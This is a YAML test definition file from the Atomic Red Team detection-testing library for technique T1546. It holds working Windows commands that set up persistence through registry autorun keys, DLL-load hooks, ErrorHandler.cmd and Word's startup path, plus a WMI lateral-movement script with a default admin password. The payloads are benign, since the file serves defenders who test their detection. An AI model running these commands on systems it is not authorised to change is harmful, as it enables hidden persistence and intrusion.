security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1546/T1546.yaml
T
Atomic Red Team doc generator 1f9715f582 Generated docs from job=generate-docs branch=master [ci skip]
2024-09-14 22:26:09 +00:00

210 lines
10 KiB
YAML
Raw Permalink Blame History

attack_technique: T1546
display_name: Event Triggered Execution
atomic_tests:
- name: Persistence with Custom AutodialDLL
auto_generated_guid: aca9ae16-7425-4b6d-8c30-cad306fdbd5b
description: |
The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice.
The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing.
[Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/)
supported_platforms:
- windows
dependencies:
- description: |
AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
prereq_command: |
if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"
executor:
command: |
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
cleanup_command:
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll
name: powershell
elevation_required: true
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
description: |-
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
supported_platforms:
- windows
input_arguments:
command:
description: Command to Execute
type: string
default: notepad.exe
executor:
command: |-
New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"
cleanup_command: |-
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)
auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
description: |-
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
supported_platforms:
- windows
input_arguments:
command:
description: Command to Execute
type: string
default: notepad.exe
executor:
command: |-
$path = "HKCU:\Software\Microsoft\Command Processor"
if (!(Test-Path -path $path)){
New-Item -ItemType Key -Path $path
}
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
cleanup_command: |-
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore
name: powershell
- name: WMI Invoke-CimMethod Start Process
auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
description: |
The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
This is a novel way to perform lateral movement or to start a remote process.
This does require WinRM to be enabled. The account performing the run will also need to be elevated.
A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
supported_platforms:
- windows
input_arguments:
dest:
description: destination computer name
type: string
default: localhost
password:
description: password for account
type: string
default: P@ssword1
username:
description: account to use
type: string
default: Administrator
process:
description: process to spawn
type: string
default: calc.exe
executor:
name: powershell
elevation_required: true
command: |
# Set the remote computer name and credentials
$RemoteComputer = "#{dest}"
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
# Create a CIM session
$CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential
# Define the process you want to start
$ProcessToStart = "#{process}"
# Invoke the Create method on the Win32_Process class to start the process
$Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}
# Check the result
if ($Result.ReturnValue -eq 0) {
Write-Host "Process started successfully with Process ID: $($Result.ProcessId)"
} else {
Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)"
}
# Clean up the CIM session
Remove-CimSession -CimSession $CimSession
- name: Adding custom debugger for Windows Error Reporting
auto_generated_guid: 17d1a3cc-3373-495a-857a-e5dd005fb302
description: |
When applications hang, the Windows Error Reporting framework allows us to attach a debugger, if it is set up in the Registry.
Adding executable of choice will let the executable to auto-execute when during any application crash due to functioning of WER framework
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs" /v Debugger /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f
cleanup_command: |
reg delete "HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs" /v Debugger /f
name: command_prompt
elevation_required: true
- name: Load custom DLL on mstsc execution
auto_generated_guid: 2db7852e-5a32-4ec7-937f-f4e027881700
description: |
Adding ClxDllPath under Terminal Server Client subkey of HKLM hive with a path to custom DLL allows for DLL loading during execution of mstsc.exe
supported_platforms:
- windows
input_arguments:
dll_inf:
description: custom DLL to be executed
type: Path
default: 'C:\Windows\System32\amsi.dll'
executor:
command: |
reg add "HKLM\SOFTWARE\Microsoft\Terminal Server Client" /v ClxDllPath /t REG_SZ /d "#{dll_inf}" /f
cleanup_command: |-
reg delete "HKLM\SOFTWARE\Microsoft\Terminal Server Client" /v ClxDllPath /f
name: command_prompt
elevation_required: true
- name: Persistence using automatic execution of custom DLL during RDP session
auto_generated_guid: b7fc4c3f-fe6e-479a-ba27-ef91b88536e3
description: |-
When remote desktop session is accepted, the system queries the key it queries the Registry key:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin.
If such key exists, the OS will attempt to read the Path value underneath.Once the Path is read, the DLL that it points to will be loaded via LoadLibrary.
supported_platforms:
- windows
executor:
command: |-
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin" /v Path /t REG_SZ /d "C:\Windows\System32\amsi.dll" /f
cleanup_command: |-
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin" /f
name: command_prompt
elevation_required: true
- name: Persistence via ErrorHandler.cmd script execution
auto_generated_guid: 547a4736-dd1c-4b48-b4fe-e916190bb2e7
description: |
Create persistence by triggering script within ErrorHandler.cmd upon the execution of specific binaries within the oobe directory.
Upon test execution, Setup.exe will be executed to further execute script within ErrorHandlercmd to launch Notepad.
supported_platforms:
- windows
dependencies:
- description: |
ErrorHandler.cmd script must exist on disk at specified at PathToAtomicsFolder\T1546\bin\ErrorHandler.cmd
prereq_command: |
if (Test-Path PathToAtomicsFolder\T1546\src\ErrorHandler.cmd) { exit 0} else { exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\T1546\src\" -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/src/ErrorHandler.cmd" -OutFile "PathToAtomicsFolder\T1546\src\ErrorHandler.cmd"
executor:
command: |
Copy-Item -Path PathToAtomicsFolder\T1546\src\ErrorHandler.cmd -Destination C:\Windows\Setup\Scripts\ErrorHandler.cmd
C:\windows\System32\oobe\Setup
cleanup_command: |-
Remove-Item C:\Windows\Setup\Scripts\ErrorHandler.cmd
name: powershell
elevation_required: true
- name: Persistence using STARTUP-PATH in MS-WORD
auto_generated_guid: f0027655-25ef-47b0-acaf-3d83d106156c
description: |-
When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\<version>\Word\Options\STARTUP-PATH and if it exists,
it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
The registry key can be abused to load malware from the mentioned path. Reboot might be required.
supported_platforms:
- windows
executor:
command: |-
reg add "HKCU\Software\Microsoft\Office\16.0\Word\Options" /v STARTUP-PATH /t REG_SZ /d "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent" /f
cleanup_command: |-
reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options /v STARTUP-PATH /f
name: command_prompt
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink